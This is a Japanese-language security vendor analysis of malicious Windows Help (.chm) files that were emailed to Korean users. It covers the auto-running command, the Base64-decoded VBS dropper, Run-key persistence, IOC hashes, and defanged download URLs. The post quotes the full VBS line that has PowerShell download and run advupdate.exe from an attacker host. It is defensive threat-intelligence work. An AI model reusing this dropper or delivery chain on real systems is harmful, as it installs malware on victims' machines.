ASEC 分析チームは最近、Windows ヘルプファイル(*.chm)形式のマルウェアが韓国国内ユーザーをターゲットに拡散していることを確認した。chm ファイルはコンパイルされた HTML Help ファイルであり、microsoft® html help executable プログラムを通じて実行される。
最近確認された chm ファイルは実行すると追加の不正なファイルをダウンロードし、このプロセスで正常な内容を含んだウィンドウが実行されるため、ユーザーが不正なファイルであることを認知しにくいといった特徴がある。
マルウェアは以下のような圧縮ファイル形式でメールに添付される形をとって配布される。
添付された圧縮ファイルの中には、Word ドキュメントと rar ファイルが含まれている。rar ファイルの内部には不正なファイルである Guide.chm が存在する。
Word ドキュメントの場合はパスワードが設定されているため、ドキュメントの内容が確認できない。圧縮ファイル内にある chm ファイルの実行を誘導するものと推定される。
Guide.chm ファイルを開くと、以下のようなヘルプウィンドウが生成される。この内容は https://mage.github.io/mage/ で確認できる内容と同じである。
chm ファイルの中身を確認すると、MAGE User Guide.html ファイル内に特定のコマンドが存在する。このコマンドは shortcut.Click(); 関数を通じて自動で実行される。
このコマンドが実行されると %USERPROFILE%\Links\ フォルダーに Document.dat と Document.vbs が生成される。Document.dat には Base64 でエンコードされたデータが存在し、これをデコードしたデータが Document.vbs に保存される。
その後、この VBS ファイルが持続的に実行されるように HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document に追加する。
Document.vbs には以下のように PowerShell を利用してさらなるファイルをダウンロードするコードが存在する。ダウンロードしたファイルは %tmp% フォルダーに advupdate.exe という名前で保存したあと、実行する。
Dim sh
Set sh=WScript.CreateObject("WScript.Shell")
sh.run "cmd /c powershell iwr -outf %tmp%\advupdate.exe hxxps://encorpost[.]com/post/post.php?type=1 & start %tmp%\advupdate.exe",0,false
Set sh=Nothing現在この URL からダウンロードされるファイルは正常なファイルだが、同じファイル名を持つマルウェアが確認されているため、ユーザーの注意が必要である。
さらに、現在までに確認された同じタイプのマルウェアは以下の通りである。
| 圧縮ファイル名 | 不正な chm ファイル名 |
|---|---|
| 法院提出資料.zip | asset.chm |
| 契約書.zip | contract.chm |
| wages.zip | wages.chm |
| document.zip | Nodejs for Game Server Development.chm |
「法院提出資料.zip」ファイルには上記で説明した不正なファイルと同じく、内部にドキュメントファイルと RAR ファイルを含んでいる。
この chm ファイルも正常なヘルプファイルに偽装している。Excel ファイルの場合はパスワードが設定されていないため、内容を確認することができる。
계약서.zip のファイル名で配布された圧縮ファイルの中には、以下のように2つのドキュメントファイルと RAR 圧縮ファイルが存在する。Word ドキュメントはどちらのファイルもパスワードが設定されており、確認が不可能である。chm ファイルの場合は特定の内容を含んでおり、正常なヘルプファイルに偽装している。
さらに確認された .chm ファイルも、実行時に %USERPROFILE%\Links\ フォルダーにスクリプトファイルをドロップおよび Run キー登録を実行する。その後、スクリプトファイルの実行時にさらなる不正なファイルをダウンロードし、%tmp% フォルダーに advupdate.exe というファイル名で保存および実行する。
確認されたダウンロード URL は、以下の通りである。
| ファイル名 | ダウンロード URL |
|---|---|
| Nodejs for Game Server Development.chm | hxxps://nhn-games[.]com/game03953/gamelist.php?type=1 |
| wages.chm | hxxps://sktelecom[.]help/download/select.php?type=1 |
| User Guide.chm | hxxps://sktelecom[.]help/download/select.php type=1 |
| contract.chm | hxxps://want-helper[.]com/database/db.php?type=1 |
| asset.chm | hxxps://want-helper[.]com/database/db.php?type=1 |
最近、圧縮形式で配布される不正な Windows ヘルプファイル(*.chm)が持続的に確認されている。圧縮ファイル名やヘルプファイルの実行画面からして、韓国国内のユーザーをターゲットにしたものと推定される。現在はダウンロード URL からは正常な実行ファイルがダウンロードされ、最終的に動作するマルウェアの機能は正確に確認することができない。ただし、攻撃者が当該 URL に様々なマルウェアをアップロードする可能性があるため、特に注意が必要である。
現在 V3 では、これらのマルウェアを以下のように検知している。
[ファイル検知]
Trojan/CHM.Agent
Downloader/CHM.Agent
[IOC]
3ae6503e836b295955a828a76ce2efa7 (CHM)
d26481e376134dc14966ccab39b91f16 (CHM)
997165ed836b8a2a6af5cf2d43af5803 (CHM)
5f1091df4c74412ef59426c1bb65f4d0 (CHM)
ae43f4d4c6123294b2f3ede294032944 (CHM)
acc6263bd54de778c1e22373d73887ab (CHM)
hxxps://encorpost[.]com/post/post.php?type=1
hxxps://nhn-games[.]com/game03953/gamelist.php?type=1
hxxps://sktelecom[.]help/download/select.php?type=1
hxxps://want-helper[.]com/database/db.php?type=1
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] https://asec.ahnlab.com/jp/32792/ […]
[…] ASEC 分析チームは、Windows ヘルプファイル(*.chm)形式のマルウェアの拡散が続いていることを確認した。最近確認された chm ファイルは、<Windows ヘルプファイル(*.chm)によって拡散している APT 攻撃>で紹介したファイルと同じタイプであり、追加のマルウェアダウンロードを目的としている。 […]
[…] Windows ヘルプファイル(*.chm)によって拡散している APT 攻撃 […]
[…] Windows ヘルプファイル(*.chm)によって拡散している APT 攻撃 – 2022.03.22 […]